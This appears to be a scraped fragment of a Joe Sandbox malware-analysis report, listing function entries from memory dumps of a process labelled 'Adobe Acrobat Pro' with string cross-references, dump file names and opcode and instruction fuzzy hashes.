Strings

C, xrefs: 1B39771E
b, xrefs: 1B3B058C
m, xrefs: 1B3B04A7

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: C$b$m
API String ID: 0-2140737248
Opcode ID: dbd916b4e9d7a19888dfb6e587f2bd17e92b487efe37a62b72376e12fba0107d
Instruction ID: 1f22f84b4ddcd27b4fb5ed0fecd57e3c109cbcd696ca38eec3963ed38d0f6c34
Opcode Fuzzy Hash: dbd916b4e9d7a19888dfb6e587f2bd17e92b487efe37a62b72376e12fba0107d
Instruction Fuzzy Hash: 89519B351087628BC719EB38D8944EB77E2EFC6320F648B7DC0A287AD5D736915ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1D07072A Relevance: 3.9, Strings: 3, Instructions: 144COMMON

Download Yara Rule

Strings

), xrefs: 1D070845
<, xrefs: 1D07074B
P, xrefs: 1D07085F

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D06A000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D06A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d06a000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: )$<$P
API String ID: 0-2454793895
Opcode ID: e068cca720dd6d4f7d07a5d3d9dba4f3259b2b4a8d86da1bd4be1b0690ec5fc1
Instruction ID: 18f372fe2f26006cfe6e4b577ec154fb8960bd970f7f1f7ebf5e60181ad4c323
Opcode Fuzzy Hash: e068cca720dd6d4f7d07a5d3d9dba4f3259b2b4a8d86da1bd4be1b0690ec5fc1
Instruction Fuzzy Hash: 9951253210C7468FD708EF28E5519EBB7E1EBC4320F618A2ED5D587196EB38A51ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AC566 Relevance: 3.9, Strings: 3, Instructions: 139COMMON

Download Yara Rule

Strings

", xrefs: 1B3AC700
d, xrefs: 1B3AC6CC
J, xrefs: 1B3AC68C

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$J$d
API String ID: 0-2487877601
Opcode ID: 1a2c1e8360f1363911e963ad6db34feae1de50c543687aabf7f2e2635dc9a7b2
Instruction ID: 8a5be534ea6a8448c0c4bea27e8c26aa62af60727aaf493859acb195300147e6
Opcode Fuzzy Hash: 1a2c1e8360f1363911e963ad6db34feae1de50c543687aabf7f2e2635dc9a7b2
Instruction Fuzzy Hash: 8D5133752087028ACB18EB39E4454AAB3E2EFD9320F648B7DC0E6C75E5EB355116DF01

Uniqueness

Uniqueness Score: -1.00%

Function 1CCA359A Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

~, xrefs: 1CCA3784
,, xrefs: 1CCA3628
}, xrefs: 1CCA3795

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ,$}$~
API String ID: 0-4148120559
Opcode ID: 377fe36c56811ce7d9db724bd109c3d6499e297ee60fd09574c4b37c6ec044d5
Instruction ID: 12fc25bd4d91f1c9755f58e0d37c39c2cc371f38b34ef5cc185c5b2d73afcf00
Opcode Fuzzy Hash: 377fe36c56811ce7d9db724bd109c3d6499e297ee60fd09574c4b37c6ec044d5
Instruction Fuzzy Hash: 9E512F74108B528FC324EF29E0909AAB7E0FFC6320F608A7CC5D583596EB74555ACB16

Uniqueness

Uniqueness Score: -1.00%

Function 1CCA3239 Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

_, xrefs: 1CCA3384
:, xrefs: 1CCA33D3
g, xrefs: 1CCA33C4

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: :$_$g
API String ID: 0-3984748446
Opcode ID: ad112d3ba461ad6a7240f40619cb07dd5ba3ce84ba000b49cf51308b327e11d7
Instruction ID: 130995f27de6e4fb64c2de9e5b42ad572eaaec96def2e75f539efecd9c4a413b
Opcode Fuzzy Hash: ad112d3ba461ad6a7240f40619cb07dd5ba3ce84ba000b49cf51308b327e11d7
Instruction Fuzzy Hash: 105133745093828FD719DF38E0804ABB7E2FFCA314F64CA6DD8958B294D738941ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0BB88 Relevance: 3.9, Strings: 3, Instructions: 131COMMON

Download Yara Rule

Strings

D, xrefs: 1CC0BBB9
G, xrefs: 1CC0BC0E
$, xrefs: 1CC0BBD8

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: $$D$G
API String ID: 0-3018872377
Opcode ID: 0e7707e58037db4c025a57f6f23e0c9bafffa1a546c85d624b0e02dc0b3d7200
Instruction ID: 4bc76535a95de8bf56c7018f7365e405e979b73cfddc506aa6bf6ecda86bcb27
Opcode Fuzzy Hash: 0e7707e58037db4c025a57f6f23e0c9bafffa1a546c85d624b0e02dc0b3d7200
Instruction Fuzzy Hash: 7D51FF3120C7478FC32CDF6CE4816AAB7E2EBC5314F149A6DE19A8B1C5CA786456CB46

Uniqueness

Uniqueness Score: -1.00%

Function 1CEDB995 Relevance: 3.9, Strings: 3, Instructions: 112COMMON

Download Yara Rule

Strings

[, xrefs: 1CEDBA34
+J(Y, xrefs: 1CEDBA71
p, xrefs: 1CEDBA7D

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: +J(Y$[$p
API String ID: 0-300795933
Opcode ID: cb8e9562fa6a3c7d4b41d5c20e5f0bf95e7392474564e5397f80fb3ec4adeeae
Instruction ID: 35415bfd37d4b51c2d22ffee0ec0c1f0b55cf3d163e671326fb4f91379bfd1d5
Opcode Fuzzy Hash: cb8e9562fa6a3c7d4b41d5c20e5f0bf95e7392474564e5397f80fb3ec4adeeae
Instruction Fuzzy Hash: 0741587511C7128BC718EF38A4604ABBBE1EFC6364F659A3DD0E1870A9E7349029DF49

Uniqueness

Uniqueness Score: -1.00%

Function 1CC10C06 Relevance: 3.8, Strings: 3, Instructions: 89COMMON

Download Yara Rule

Strings

", xrefs: 1CC10D32
}, xrefs: 1CC10C4A
,, xrefs: 1CC10CFE

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$,$}
API String ID: 0-3162038451
Opcode ID: 7425aabddfcd31b64b8037a51bf4f8ba9b06aa0d744fdbb8a1162ab11c4e1966
Instruction ID: 55fc0bd05b77d15a0d0fe75881ba5d0b02ff24ed4be4bf31377e3e05350241d7
Opcode Fuzzy Hash: 7425aabddfcd31b64b8037a51bf4f8ba9b06aa0d744fdbb8a1162ab11c4e1966
Instruction Fuzzy Hash: 8C3155302187864BD325EF64D4504ABB3A2FFD9724F60C66DD0D68B299D3319906DB22

Uniqueness

Uniqueness Score: -1.00%

Function 1CEDB70E Relevance: 3.8, Strings: 3, Instructions: 66COMMON

Download Yara Rule

Strings

+=, xrefs: 1CEDB7BB
m, xrefs: 1CEDB7A4
G, xrefs: 1CEDB777

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: +=$G$m
API String ID: 0-494302990
Opcode ID: 1b8755d5192c39d46f1b125504391f6da34fcb75cf260e3a29f2726afde23ab3
Instruction ID: 6e702f204253d7a065106d9308f08f524f9bf8076f469ae46ada5078ecc815fe
Opcode Fuzzy Hash: 1b8755d5192c39d46f1b125504391f6da34fcb75cf260e3a29f2726afde23ab3
Instruction Fuzzy Hash: 7C31E176A1C7468BC318EF68E80149BB7E2BBC1360F64DB3D909A879D4D7781115CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AD178 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

L, xrefs: 1B3C3843
C, xrefs: 1B3AD257

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: C$L
API String ID: 0-52364950
Opcode ID: 6a231d529ecaa81607012835b2b10feac7a6ad1d2d735f0ac23cf399a5a6f36e
Instruction ID: 109ef895be0975cfd05d40252e5619c166bd710c6ca3d47f34c88d0842c46285
Opcode Fuzzy Hash: 6a231d529ecaa81607012835b2b10feac7a6ad1d2d735f0ac23cf399a5a6f36e
Instruction Fuzzy Hash: 4151CA394083928BD708EB34E4910FA77E1EFD6310F209A6ED4C6CB6C1E774950ADB05

Uniqueness

Uniqueness Score: -1.00%

Function 1D01F1BF Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

)y?&, xrefs: 1D01F230
H, xrefs: 1D01F3B0

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D019000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d019000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: )y?&$H
API String ID: 0-2026147138
Opcode ID: 4a8056dccb9de0eae650272994449c3fd142b32f88057674b073104113fe823a
Instruction ID: e4cfc0071f4a977f81afc2f2ef77b2e1e985a6906b116536d0e5202dbe711548
Opcode Fuzzy Hash: 4a8056dccb9de0eae650272994449c3fd142b32f88057674b073104113fe823a
Instruction Fuzzy Hash: 3C516A39528B564BD318EF59E4814EAB3E6FFC6300F505A2DC8C387155DA30E917CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BF4C4 Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

H, xrefs: 1B3BF6D9
D, xrefs: 1B3BF5C0

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: D$H
API String ID: 0-20829194
Opcode ID: 38e51484c0e8e558cf1dfcd4675544ac09443af85c28840969dc97637cc2138c
Instruction ID: 90f96fb0e77a9c74872c8fbc681eff8643ac63afe744a4936c6cfca775255ff8
Opcode Fuzzy Hash: 38e51484c0e8e558cf1dfcd4675544ac09443af85c28840969dc97637cc2138c
Instruction Fuzzy Hash: B2518839108A424FD318EB39E4815EB77E2EFC5324FA49A2DD0D9C71D1DB399009CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1AD67F63 Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

b, xrefs: 1AD68153
:, xrefs: 1AD680E1

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: :$b
API String ID: 0-2229885062
Opcode ID: f46b751abfa122c6b6b4287c3c822420fe5d320961d10a2400b4f13dd58930c3
Instruction ID: 46a9c1c1eb23bf024e0c4eab3284d3612ddbb06dcbde93947739ef1484e182b0
Opcode Fuzzy Hash: f46b751abfa122c6b6b4287c3c822420fe5d320961d10a2400b4f13dd58930c3
Instruction Fuzzy Hash: 21518C3910CB128BC315EF29D8915BAB7E1FFC4310FA58A6DD4C687295DB39A106CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3CF627 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

", xrefs: 1B3CF815
q, xrefs: 1B3CF641

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$q
API String ID: 0-308472720
Opcode ID: 0fde96f63cf0e1f8c0009a7180b06b1b4098968d353a94068f540f90f862704a
Instruction ID: 87e63ece0c133f49bea45dd63cc7b46f895c21ef08a6f29bbfabb948a68ef0b3
Opcode Fuzzy Hash: 0fde96f63cf0e1f8c0009a7180b06b1b4098968d353a94068f540f90f862704a
Instruction Fuzzy Hash: 00515A352183858FD715EF78E9908DABBE2FFD6320F609A2DD0D587695D738A40ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBA0D6 Relevance: 2.6, Strings: 2, Instructions: 140COMMON

Download Yara Rule

Strings

n, xrefs: 1ADC0410
4, xrefs: 1ADBA1B6

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 4$n
API String ID: 0-2277587367
Opcode ID: 91f73e6be9effad16c0ee5b309d4ecf42b6b3002e2c041c9ece8c78236624ba1
Instruction ID: 581cb38e3804c5dc1de86c0dec8bca5dde47ebab20bb0f5b5f7b1fc6abb9daa4
Opcode Fuzzy Hash: 91f73e6be9effad16c0ee5b309d4ecf42b6b3002e2c041c9ece8c78236624ba1
Instruction Fuzzy Hash: 66514875109B018BC309EE3DE8D14EBB7A6EFC5320F649B3D90A6871E5E736501ACB02

Uniqueness

Uniqueness Score: -1.00%

Function 1CC01F51 Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

o, xrefs: 1CC01F78
c, xrefs: 1CC020BA

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: c$o
API String ID: 0-2570400004
Opcode ID: 23f77b43a8e2b59dc8309a312e51119bd2ea0f96dcd4b68892607d2b72cd8c8e
Instruction ID: 09b81ae56fb9e798334e8e66e254ba523d943a6e908ecacbce14c0cdc11a3796
Opcode Fuzzy Hash: 23f77b43a8e2b59dc8309a312e51119bd2ea0f96dcd4b68892607d2b72cd8c8e
Instruction Fuzzy Hash: 45514471104B428BE319EB38D0914EBB3D1EFC6354FA09A2DC4C2CB0C5DB7A911ADB95

Uniqueness

Uniqueness Score: -1.00%

Function 1D071969 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

D, xrefs: 1D071A39
,, xrefs: 1D0719B9

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D06A000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D06A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d06a000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ,$D
API String ID: 0-1313800889
Opcode ID: bbcc266d45e7c4aa61fbc644762eed26502be288617b6c107f9d123f7a27f06b
Instruction ID: 12cc3e8ea4ed672c539f956bfc783bd6f79cf28a70f790d835f4817d9737e44c
Opcode Fuzzy Hash: bbcc266d45e7c4aa61fbc644762eed26502be288617b6c107f9d123f7a27f06b
Instruction Fuzzy Hash: 4E417875108B524BD708AB3AE9904EAB7E1EBC2320F64577EC1D6870E1DB39120ACB46

Uniqueness

Uniqueness Score: -1.00%

Function 1AD6CDEB Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

,i"h, xrefs: 1AD6CE58
l, xrefs: 1AD6CEAD

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ,i"h$l
API String ID: 0-2895986730
Opcode ID: 2bab2c90a713b7439b1676dc5037b139bcb7a7b1dabba96083a98cc21693f714
Instruction ID: ae6e713fbe4476467e6acbb36ab3811a4683e49bc6fa952551231514001a5f39
Opcode Fuzzy Hash: 2bab2c90a713b7439b1676dc5037b139bcb7a7b1dabba96083a98cc21693f714
Instruction Fuzzy Hash: 085159351146068BD718DF29D4800ABB3E2EFC9310B62DA3DD9AACB1C5DB34E10BCB41

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB80D9 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

(, xrefs: 1ADB8283
4, xrefs: 1ADB815C

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ($4
API String ID: 0-423877465
Opcode ID: 7e4abeff57877e56e9cb44139fb6d695f1695bd13977251e40b412e00b1f6dae
Instruction ID: 0386d41ce976ebcaa1ea4bdd6e51267ea579ff5be183bc3fdcb3007b5d5057ef
Opcode Fuzzy Hash: 7e4abeff57877e56e9cb44139fb6d695f1695bd13977251e40b412e00b1f6dae
Instruction Fuzzy Hash: 624148755197578FC715EF38C4804CAB3A1EFD6320F948A2DC4A2876A5E739A11ACF42

Uniqueness

Uniqueness Score: -1.00%

Function 1CC04889 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

d, xrefs: 1CC04A54
_, xrefs: 1CC04A3C

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: _$d
API String ID: 0-597095544
Opcode ID: e5dea7dc67289c601fb5e893faab1a5a750b7969d5f88b6859e8b5ff33969e22
Instruction ID: 784dc610ff944522b007fbe086f21652b33f93f40d7a80b346cc7f8894cf71d7
Opcode Fuzzy Hash: e5dea7dc67289c601fb5e893faab1a5a750b7969d5f88b6859e8b5ff33969e22
Instruction Fuzzy Hash: C94136751083428FC718EF28D45089BB7E6FFC5320F90CA6DE495CB694EB34990ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 1B39AB3E Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

f, xrefs: 1B39AC13
", xrefs: 1B39D667

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$f
API String ID: 0-2444324439
Opcode ID: cd68d4cd66d5e3e62902af0a13ed139d1d08974bacff3c0eb2b851c5cf138e8b
Instruction ID: 6401d4ddcd521cafee33314f68d7e9d8df2e6a905ecbcfbe94848b08e4d94a1c
Opcode Fuzzy Hash: cd68d4cd66d5e3e62902af0a13ed139d1d08974bacff3c0eb2b851c5cf138e8b
Instruction Fuzzy Hash: BE414631A08A224BCB19DB39C4954FAB3E2EFD5311F84CA3ED1D387595EA39550ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1CC03783 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

\, xrefs: 1CC038E3
B, xrefs: 1CC03856

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: B$\
API String ID: 0-527072453
Opcode ID: 84354c99d28e1a705791527c5a4391e3123bf554e5ef15f73bf4891dc68042b7
Instruction ID: a8dcfbce2063c26195a2b7b6bc741524224526db8855a889e6362cbfd9b28c72
Opcode Fuzzy Hash: 84354c99d28e1a705791527c5a4391e3123bf554e5ef15f73bf4891dc68042b7
Instruction Fuzzy Hash: 0A412671218B524BE314EA39D9508EFB7E2FFC6375F688B6C91A18B1E6C7345009CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BCBBC Relevance: 2.6, Strings: 2, Instructions: 109COMMON

Download Yara Rule

Strings

4, xrefs: 1B3B3E12
,, xrefs: 1B3BCCC9

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: ,$4
API String ID: 0-508195717
Opcode ID: 32918b731492f19a0b7f57d8e1ff697ec86804e1e7d0354a905e3656ef12bc10
Instruction ID: 99f83a9994bc7750467f797b1e07e9f9c53a10e68f206e6feb90ec90585289fb
Opcode Fuzzy Hash: 32918b731492f19a0b7f57d8e1ff697ec86804e1e7d0354a905e3656ef12bc10
Instruction Fuzzy Hash: 464122751187428FC718EB74E8819ABB3E2EFD4314F65CA3DD09593092D639902ACB06

Uniqueness

Uniqueness Score: -1.00%

Function 1CC053AF Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

a, xrefs: 1CC05468
}, xrefs: 1CC0B482

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: a$}
API String ID: 0-1762169890
Opcode ID: 216edf0f01fe493afb19b832f8a2d61edb4945f21ebfd1740c6302ddef2470e0
Instruction ID: 11f14ed93297e6d70388c56ccd9d35b34d368fd9e0c44458679581561d0fa3c3
Opcode Fuzzy Hash: 216edf0f01fe493afb19b832f8a2d61edb4945f21ebfd1740c6302ddef2470e0
Instruction Fuzzy Hash: 3F412231108B528BE308EF68E45459FB7E0FBC5324FA4CA3ED1A68B894E770951ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB48D4 Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

M, xrefs: 1ADB4965
K, xrefs: 1ADB49F0

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: K$M
API String ID: 0-2047567800
Opcode ID: 09319dc172dd2e59371a7f8af73e549f08ccf536ec916302dbff4b7f6a293213
Instruction ID: 354aa3d928c3e7787627382e60136f8d87064c157bddb050713c7cd37ea3c659
Opcode Fuzzy Hash: 09319dc172dd2e59371a7f8af73e549f08ccf536ec916302dbff4b7f6a293213
Instruction Fuzzy Hash: 154166385187428BCB14EF38D8914EA77E2FFC5314F419A2DD49ACB2D4DB39A516CB02

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBC3B6 Relevance: 2.6, Strings: 2, Instructions: 98COMMON

Download Yara Rule

Strings

o, xrefs: 1ADBC3C8
<6s, xrefs: 1ADBC3DA

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: <6s$o
API String ID: 0-2108497161
Opcode ID: ccf8c2f815503dbb9efaf1a6f95a6d73efe64537f03b678ee1f3d0b91fd92689
Instruction ID: 5968739e3ab2c2ff2815851d2201fb576ea26c7d3b95f32c690f38cceb3f57e2
Opcode Fuzzy Hash: ccf8c2f815503dbb9efaf1a6f95a6d73efe64537f03b678ee1f3d0b91fd92689
Instruction Fuzzy Hash: 604189751087664BC31DDF6498A147AB7A1FFCA310F54CA7DE896836C8DB745405CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1CC97A06 Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

#, xrefs: 1CC97B0B
b, xrefs: 1CC97A96

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: #$b
API String ID: 0-2535374969
Opcode ID: 425c0a3597bd85e4873c152116ed54473ff713dd4c3e8a41a10b9aa8eb7381a5
Instruction ID: 3c8b9a099d6e8b8878e9fa19934be612652304e40d22cef897fb5245285397ea
Opcode Fuzzy Hash: 425c0a3597bd85e4873c152116ed54473ff713dd4c3e8a41a10b9aa8eb7381a5
Instruction Fuzzy Hash: CA4168342083538BC315EB38D0506DB77E2EFC6324F648AADD0D58B185E779A41ACF56

Uniqueness

Uniqueness Score: -1.00%

Function 1CED9480 Relevance: 2.6, Strings: 2, Instructions: 88COMMON

Download Yara Rule

Strings

g, xrefs: 1CED9502
D, xrefs: 1CED95C5

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: D$g
API String ID: 0-2867652947
Opcode ID: 95768d2f951e5deb5bbb0fd69cfcb0129749593be784fcd85f86e74bd9d75737
Instruction ID: 9656fff224245c2a09d8dc3e745d55e638c88425889bcae07fc04412c8e4bac5
Opcode Fuzzy Hash: 95768d2f951e5deb5bbb0fd69cfcb0129749593be784fcd85f86e74bd9d75737
Instruction Fuzzy Hash: 7D4104342087928FC319EB28D4614BBB7E0EFC6311F908B6ED4D2871D4D7286216CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C4E49 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

", xrefs: 1B3C4EC6
-, xrefs: 1B3C4EED

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "$-
API String ID: 0-1891628623
Opcode ID: d578a75496c166827be6a1ec1e53c8506e28ae3e49411fa98c3be3f54f760f27
Instruction ID: 64bc209b51ca426c93831681b5a57147261489dc79f1c5d90c0ac5f2ab215013
Opcode Fuzzy Hash: d578a75496c166827be6a1ec1e53c8506e28ae3e49411fa98c3be3f54f760f27
Instruction Fuzzy Hash: 643144361087128FD328EA2DE8959FBB3D1EFC1324F608A3E9496CB1C5E730541ADB01

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBDE26 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

X, xrefs: 1ADBDE9D
U, xrefs: 1ADBDE2E

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: U$X
API String ID: 0-23989545
Opcode ID: c539e2032a2673352df0bd3ec740cc0f9bff5e5f1604e75eacdbc5041d159911
Instruction ID: 2f6dbf7bad48a5dfafca98bd09e71e482b68393a480d7f39dd96986bcf510e2f
Opcode Fuzzy Hash: c539e2032a2673352df0bd3ec740cc0f9bff5e5f1604e75eacdbc5041d159911
Instruction Fuzzy Hash: C53102B44187018BC719EF39E4954ABBBE1EBD1314F619A3DC492831D9DB30912ADF46

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0FD1E Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

/, xrefs: 1CC0FD65
~, xrefs: 1CC0FDBD

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

